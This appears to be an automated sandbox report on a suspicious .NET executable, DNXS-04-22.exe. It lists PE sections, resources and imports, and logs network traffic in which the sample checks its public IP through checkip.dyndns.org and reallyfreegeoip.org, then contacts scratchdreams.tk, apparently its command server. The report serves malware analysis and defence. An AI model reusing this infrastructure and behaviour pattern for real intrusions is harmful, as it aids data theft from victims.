add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebx], dh
inc ecx
inc esp
inc ebx
push ecx
pop ecx
dec eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 00h
add eax, dword ptr [eax]
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax+0000000Eh], al
nop
add byte ptr [eax], al
adc byte ptr [eax], 00000000h
add byte ptr [eax], al
test al, 00h
add byte ptr [eax+00000018h], al
rol byte ptr [eax], 00000000h
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
or al, byte ptr [eax]
add dword ptr [eax], eax
add byte ptr [eax], al
fadd dword ptr [eax]
add byte ptr [eax+00000002h], al
lock add byte ptr [eax], al
add byte ptr [ebx], 00000000h
add byte ptr [eax], al
or byte ptr [ecx], al
add byte ptr [eax+00000004h], al
and byte ptr [ecx], al
add byte ptr [eax+00000005h], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x91f46	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x92000	0x48b08	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xdc000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x8fff0	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x8ffc0	0x90000	23535d0fce5f90ab80d1442c71aa08dd	False	0.9517567952473959	data	7.955380797779595	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x92000	0x48b08	0x48c00	d54f1b070a21becf5ae461767ddbd1e7	False	0.06335910652920962	data	4.769857157185432	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xdc000	0xc	0x200	96e2b08ea7a02a7d621895485b579d25	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x922e0	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 0	0.1798780487804878
RT_ICON	0x92948	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	0.2513440860215054
RT_ICON	0x92c30	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	0.3918918918918919
RT_ICON	0x92d58	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.3200959488272921
RT_ICON	0x93c00	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.33664259927797835
RT_ICON	0x944a8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	0.2622832369942196
RT_ICON	0x94a10	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 0	0.04393141403083114
RT_ICON	0xd6a38	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.18786307053941909
RT_ICON	0xd8fe0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.2453095684803002
RT_ICON	0xda088	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.3484042553191489
RT_GROUP_ICON	0xda4f0	0x92	data	0.5753424657534246
RT_VERSION	0xda584	0x398	OpenPGP Public Key	0.4217391304347826
RT_MANIFEST	0xda91c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 2, 2024 08:00:15.813343048 CEST	49708	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:15.921458006 CEST	80	49708	193.122.130.0	192.168.2.8
May 2, 2024 08:00:15.921549082 CEST	49708	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:15.921848059 CEST	49708	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:16.030081987 CEST	80	49708	193.122.130.0	192.168.2.8
May 2, 2024 08:00:17.675807953 CEST	80	49708	193.122.130.0	192.168.2.8
May 2, 2024 08:00:17.683197975 CEST	49708	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:17.791400909 CEST	80	49708	193.122.130.0	192.168.2.8
May 2, 2024 08:00:20.283941031 CEST	80	49708	193.122.130.0	192.168.2.8
May 2, 2024 08:00:20.355406046 CEST	49708	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:20.789751053 CEST	49711	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:20.789793015 CEST	443	49711	104.21.67.152	192.168.2.8
May 2, 2024 08:00:20.789849043 CEST	49711	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:20.803563118 CEST	49711	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:20.803579092 CEST	443	49711	104.21.67.152	192.168.2.8
May 2, 2024 08:00:20.990716934 CEST	443	49711	104.21.67.152	192.168.2.8
May 2, 2024 08:00:20.990799904 CEST	49711	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:20.997865915 CEST	49711	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:20.997890949 CEST	443	49711	104.21.67.152	192.168.2.8
May 2, 2024 08:00:20.998167992 CEST	443	49711	104.21.67.152	192.168.2.8
May 2, 2024 08:00:21.042924881 CEST	49711	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:21.087055922 CEST	49711	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:21.128123045 CEST	443	49711	104.21.67.152	192.168.2.8
May 2, 2024 08:00:21.213068962 CEST	443	49711	104.21.67.152	192.168.2.8
May 2, 2024 08:00:21.213190079 CEST	443	49711	104.21.67.152	192.168.2.8
May 2, 2024 08:00:21.213243008 CEST	49711	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:21.243136883 CEST	49711	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:21.250121117 CEST	49708	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:21.358424902 CEST	80	49708	193.122.130.0	192.168.2.8
May 2, 2024 08:00:23.359821081 CEST	80	49708	193.122.130.0	192.168.2.8
May 2, 2024 08:00:23.362519026 CEST	49712	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:23.362554073 CEST	443	49712	104.21.67.152	192.168.2.8
May 2, 2024 08:00:23.362618923 CEST	49712	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:23.362891912 CEST	49712	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:23.362901926 CEST	443	49712	104.21.67.152	192.168.2.8
May 2, 2024 08:00:23.402391911 CEST	49708	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:23.548300028 CEST	443	49712	104.21.67.152	192.168.2.8
May 2, 2024 08:00:23.551197052 CEST	49712	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:23.551218987 CEST	443	49712	104.21.67.152	192.168.2.8
May 2, 2024 08:00:23.774733067 CEST	443	49712	104.21.67.152	192.168.2.8
May 2, 2024 08:00:23.774842978 CEST	443	49712	104.21.67.152	192.168.2.8
May 2, 2024 08:00:23.774898052 CEST	49712	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:23.775338888 CEST	49712	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:23.781193018 CEST	49708	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:23.782213926 CEST	49713	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:23.889870882 CEST	80	49708	193.122.130.0	192.168.2.8
May 2, 2024 08:00:23.889946938 CEST	49708	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:23.891509056 CEST	80	49713	193.122.130.0	192.168.2.8
May 2, 2024 08:00:23.891654968 CEST	49713	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:23.891745090 CEST	49713	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:23.999748945 CEST	80	49713	193.122.130.0	192.168.2.8
May 2, 2024 08:00:25.000273943 CEST	80	49713	193.122.130.0	192.168.2.8
May 2, 2024 08:00:25.001538992 CEST	49714	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:25.001590967 CEST	443	49714	104.21.67.152	192.168.2.8
May 2, 2024 08:00:25.001650095 CEST	49714	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:25.001890898 CEST	49714	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:25.001908064 CEST	443	49714	104.21.67.152	192.168.2.8
May 2, 2024 08:00:25.043083906 CEST	49713	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:25.187294960 CEST	443	49714	104.21.67.152	192.168.2.8
May 2, 2024 08:00:25.188972950 CEST	49714	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:25.189006090 CEST	443	49714	104.21.67.152	192.168.2.8
May 2, 2024 08:00:25.412323952 CEST	443	49714	104.21.67.152	192.168.2.8
May 2, 2024 08:00:25.412461996 CEST	443	49714	104.21.67.152	192.168.2.8
May 2, 2024 08:00:25.412549019 CEST	49714	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:25.413003922 CEST	49714	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:25.417268991 CEST	49715	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:25.525482893 CEST	80	49715	193.122.130.0	192.168.2.8
May 2, 2024 08:00:25.525576115 CEST	49715	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:25.525721073 CEST	49715	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:25.635013103 CEST	80	49715	193.122.130.0	192.168.2.8
May 2, 2024 08:00:25.635040045 CEST	80	49715	193.122.130.0	192.168.2.8
May 2, 2024 08:00:25.636691093 CEST	49716	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:25.636753082 CEST	443	49716	104.21.67.152	192.168.2.8
May 2, 2024 08:00:25.636836052 CEST	49716	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:25.637135983 CEST	49716	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:25.637151957 CEST	443	49716	104.21.67.152	192.168.2.8
May 2, 2024 08:00:25.683592081 CEST	49715	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:25.818063021 CEST	443	49716	104.21.67.152	192.168.2.8
May 2, 2024 08:00:25.819703102 CEST	49716	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:25.819746017 CEST	443	49716	104.21.67.152	192.168.2.8
May 2, 2024 08:00:26.041410923 CEST	443	49716	104.21.67.152	192.168.2.8
May 2, 2024 08:00:26.041528940 CEST	443	49716	104.21.67.152	192.168.2.8
May 2, 2024 08:00:26.041608095 CEST	49716	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:26.042146921 CEST	49716	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:26.045969963 CEST	49715	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:26.046597004 CEST	49717	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:26.154078007 CEST	80	49715	193.122.130.0	192.168.2.8
May 2, 2024 08:00:26.154151917 CEST	49715	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:26.154376030 CEST	80	49717	193.122.130.0	192.168.2.8
May 2, 2024 08:00:26.154450893 CEST	49717	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:26.154671907 CEST	49717	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:26.262572050 CEST	80	49717	193.122.130.0	192.168.2.8
May 2, 2024 08:00:27.696715117 CEST	80	49717	193.122.130.0	192.168.2.8
May 2, 2024 08:00:27.697782040 CEST	49718	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:27.697814941 CEST	443	49718	104.21.67.152	192.168.2.8
May 2, 2024 08:00:27.697886944 CEST	49718	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:27.698105097 CEST	49718	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:27.698116064 CEST	443	49718	104.21.67.152	192.168.2.8
May 2, 2024 08:00:27.746047974 CEST	49717	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:27.882801056 CEST	443	49718	104.21.67.152	192.168.2.8
May 2, 2024 08:00:27.933540106 CEST	49718	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:28.744839907 CEST	49718	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:28.744868994 CEST	443	49718	104.21.67.152	192.168.2.8
May 2, 2024 08:00:28.845112085 CEST	443	49718	104.21.67.152	192.168.2.8
May 2, 2024 08:00:28.845215082 CEST	443	49718	104.21.67.152	192.168.2.8
May 2, 2024 08:00:28.845262051 CEST	49718	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:28.845838070 CEST	49718	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:28.849495888 CEST	49717	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:28.850070000 CEST	49719	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:28.957516909 CEST	80	49717	193.122.130.0	192.168.2.8
May 2, 2024 08:00:28.957658052 CEST	49717	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:28.958338976 CEST	80	49719	193.122.130.0	192.168.2.8
May 2, 2024 08:00:28.958416939 CEST	49719	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:28.958559036 CEST	49719	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:29.066813946 CEST	80	49719	193.122.130.0	192.168.2.8
May 2, 2024 08:00:29.665608883 CEST	80	49719	193.122.130.0	192.168.2.8
May 2, 2024 08:00:29.666918993 CEST	49720	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:29.666968107 CEST	443	49720	104.21.67.152	192.168.2.8
May 2, 2024 08:00:29.667053938 CEST	49720	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:29.667284012 CEST	49720	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:29.667298079 CEST	443	49720	104.21.67.152	192.168.2.8
May 2, 2024 08:00:29.714791059 CEST	49719	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:29.849915981 CEST	443	49720	104.21.67.152	192.168.2.8
May 2, 2024 08:00:29.851768970 CEST	49720	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:29.851807117 CEST	443	49720	104.21.67.152	192.168.2.8
May 2, 2024 08:00:30.075386047 CEST	443	49720	104.21.67.152	192.168.2.8
May 2, 2024 08:00:30.075510979 CEST	443	49720	104.21.67.152	192.168.2.8
May 2, 2024 08:00:30.075601101 CEST	49720	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:30.076169014 CEST	49720	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:30.079520941 CEST	49719	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:30.080090046 CEST	49721	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:30.187711954 CEST	80	49719	193.122.130.0	192.168.2.8
May 2, 2024 08:00:30.187863111 CEST	49719	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:30.188148022 CEST	80	49721	193.122.130.0	192.168.2.8
May 2, 2024 08:00:30.188215971 CEST	49721	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:30.235372066 CEST	49721	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:30.343282938 CEST	80	49721	193.122.130.0	192.168.2.8
May 2, 2024 08:00:31.349513054 CEST	80	49721	193.122.130.0	192.168.2.8
May 2, 2024 08:00:31.418026924 CEST	49721	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:31.525774002 CEST	49722	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:31.525809050 CEST	443	49722	104.21.67.152	192.168.2.8
May 2, 2024 08:00:31.525871038 CEST	49722	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:31.526437998 CEST	49722	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:31.526452065 CEST	443	49722	104.21.67.152	192.168.2.8
May 2, 2024 08:00:31.708712101 CEST	443	49722	104.21.67.152	192.168.2.8
May 2, 2024 08:00:31.726382017 CEST	49722	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:31.726414919 CEST	443	49722	104.21.67.152	192.168.2.8
May 2, 2024 08:00:31.956386089 CEST	443	49722	104.21.67.152	192.168.2.8
May 2, 2024 08:00:31.956522942 CEST	443	49722	104.21.67.152	192.168.2.8
May 2, 2024 08:00:31.956605911 CEST	49722	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:31.957039118 CEST	49722	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:31.960225105 CEST	49721	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:31.960910082 CEST	49723	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:32.068170071 CEST	80	49721	193.122.130.0	192.168.2.8
May 2, 2024 08:00:32.068367958 CEST	49721	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:32.069163084 CEST	80	49723	193.122.130.0	192.168.2.8
May 2, 2024 08:00:32.069256067 CEST	49723	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:32.069479942 CEST	49723	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:32.177364111 CEST	80	49723	193.122.130.0	192.168.2.8
May 2, 2024 08:00:32.178241968 CEST	80	49723	193.122.130.0	192.168.2.8
May 2, 2024 08:00:32.186765909 CEST	49725	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:32.186814070 CEST	443	49725	104.21.67.152	192.168.2.8
May 2, 2024 08:00:32.186997890 CEST	49725	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:32.187148094 CEST	49725	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:32.187160015 CEST	443	49725	104.21.67.152	192.168.2.8
May 2, 2024 08:00:32.230590105 CEST	49723	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:32.372229099 CEST	443	49725	104.21.67.152	192.168.2.8
May 2, 2024 08:00:32.393805981 CEST	49725	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:32.393838882 CEST	443	49725	104.21.67.152	192.168.2.8
May 2, 2024 08:00:32.602057934 CEST	443	49725	104.21.67.152	192.168.2.8
May 2, 2024 08:00:32.602161884 CEST	443	49725	104.21.67.152	192.168.2.8
May 2, 2024 08:00:32.602216005 CEST	49725	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:32.602606058 CEST	49725	443	192.168.2.8	104.21.67.152
May 2, 2024 08:00:32.626698971 CEST	49723	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:32.734776974 CEST	80	49723	193.122.130.0	192.168.2.8
May 2, 2024 08:00:32.734831095 CEST	49723	80	192.168.2.8	193.122.130.0
May 2, 2024 08:00:32.778140068 CEST	49726	443	192.168.2.8	104.21.27.85
May 2, 2024 08:00:32.778188944 CEST	443	49726	104.21.27.85	192.168.2.8
May 2, 2024 08:00:32.778242111 CEST	49726	443	192.168.2.8	104.21.27.85
May 2, 2024 08:00:32.778706074 CEST	49726	443	192.168.2.8	104.21.27.85
May 2, 2024 08:00:32.778719902 CEST	443	49726	104.21.27.85	192.168.2.8
May 2, 2024 08:00:32.988868952 CEST	443	49726	104.21.27.85	192.168.2.8
May 2, 2024 08:00:32.988956928 CEST	49726	443	192.168.2.8	104.21.27.85
May 2, 2024 08:00:32.990669966 CEST	49726	443	192.168.2.8	104.21.27.85
May 2, 2024 08:00:32.990679026 CEST	443	49726	104.21.27.85	192.168.2.8
May 2, 2024 08:00:32.990923882 CEST	443	49726	104.21.27.85	192.168.2.8
May 2, 2024 08:00:32.992181063 CEST	49726	443	192.168.2.8	104.21.27.85
May 2, 2024 08:00:33.036123037 CEST	443	49726	104.21.27.85	192.168.2.8
May 2, 2024 08:01:12.336486101 CEST	443	49726	104.21.27.85	192.168.2.8
May 2, 2024 08:01:12.336549997 CEST	443	49726	104.21.27.85	192.168.2.8
May 2, 2024 08:01:12.336806059 CEST	49726	443	192.168.2.8	104.21.27.85
May 2, 2024 08:01:12.342061996 CEST	49726	443	192.168.2.8	104.21.27.85
May 2, 2024 08:01:30.010896921 CEST	80	49713	193.122.130.0	192.168.2.8
May 2, 2024 08:01:30.011044025 CEST	49713	80	192.168.2.8	193.122.130.0

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 2, 2024 08:00:15.714092970 CEST	63487	53	192.168.2.8	1.1.1.1
May 2, 2024 08:00:15.801767111 CEST	53	63487	1.1.1.1	192.168.2.8
May 2, 2024 08:00:20.680780888 CEST	51389	53	192.168.2.8	1.1.1.1
May 2, 2024 08:00:20.769377947 CEST	53	51389	1.1.1.1	192.168.2.8
May 2, 2024 08:00:32.627398968 CEST	50296	53	192.168.2.8	1.1.1.1
May 2, 2024 08:00:32.777379036 CEST	53	50296	1.1.1.1	192.168.2.8
May 2, 2024 08:00:46.314580917 CEST	53605	53	192.168.2.8	1.1.1.1
May 2, 2024 08:00:46.432857990 CEST	53	53605	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 2, 2024 08:00:15.714092970 CEST	192.168.2.8	1.1.1.1	0x7943	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
May 2, 2024 08:00:20.680780888 CEST	192.168.2.8	1.1.1.1	0xd987	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
May 2, 2024 08:00:32.627398968 CEST	192.168.2.8	1.1.1.1	0xdbc2	Standard query (0)	scratchdreams.tk	A (IP address)	IN (0x0001)	false
May 2, 2024 08:00:46.314580917 CEST	192.168.2.8	1.1.1.1	0x9718	Standard query (0)	scratchdreams.tk	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 2, 2024 08:00:15.801767111 CEST	1.1.1.1	192.168.2.8	0x7943	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
May 2, 2024 08:00:15.801767111 CEST	1.1.1.1	192.168.2.8	0x7943	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
May 2, 2024 08:00:15.801767111 CEST	1.1.1.1	192.168.2.8	0x7943	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
May 2, 2024 08:00:15.801767111 CEST	1.1.1.1	192.168.2.8	0x7943	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
May 2, 2024 08:00:15.801767111 CEST	1.1.1.1	192.168.2.8	0x7943	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
May 2, 2024 08:00:15.801767111 CEST	1.1.1.1	192.168.2.8	0x7943	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
May 2, 2024 08:00:20.769377947 CEST	1.1.1.1	192.168.2.8	0xd987	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
May 2, 2024 08:00:20.769377947 CEST	1.1.1.1	192.168.2.8	0xd987	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
May 2, 2024 08:00:32.777379036 CEST	1.1.1.1	192.168.2.8	0xdbc2	No error (0)	scratchdreams.tk		104.21.27.85	A (IP address)	IN (0x0001)	false
May 2, 2024 08:00:32.777379036 CEST	1.1.1.1	192.168.2.8	0xdbc2	No error (0)	scratchdreams.tk		172.67.169.18	A (IP address)	IN (0x0001)	false
May 2, 2024 08:00:46.432857990 CEST	1.1.1.1	192.168.2.8	0x9718	No error (0)	scratchdreams.tk		104.21.27.85	A (IP address)	IN (0x0001)	false
May 2, 2024 08:00:46.432857990 CEST	1.1.1.1	192.168.2.8	0x9718	No error (0)	scratchdreams.tk		172.67.169.18	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

scratchdreams.tk

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49708	193.122.130.0	80	7264	C:\Users\user\Desktop\DNXS-04-22.exe

Timestamp	Bytes transferred	Direction	Data
May 2, 2024 08:00:15.921848059 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
May 2, 2024 08:00:17.675807953 CEST	275	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 06:00:17 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.225</body></html>
May 2, 2024 08:00:17.683197975 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
May 2, 2024 08:00:20.283941031 CEST	275	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 06:00:20 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.225</body></html>
May 2, 2024 08:00:21.250121117 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
May 2, 2024 08:00:23.359821081 CEST	275	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 06:00:23 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.225</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49713	193.122.130.0	80	7264	C:\Users\user\Desktop\DNXS-04-22.exe

Timestamp	Bytes transferred	Direction	Data
May 2, 2024 08:00:23.891745090 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
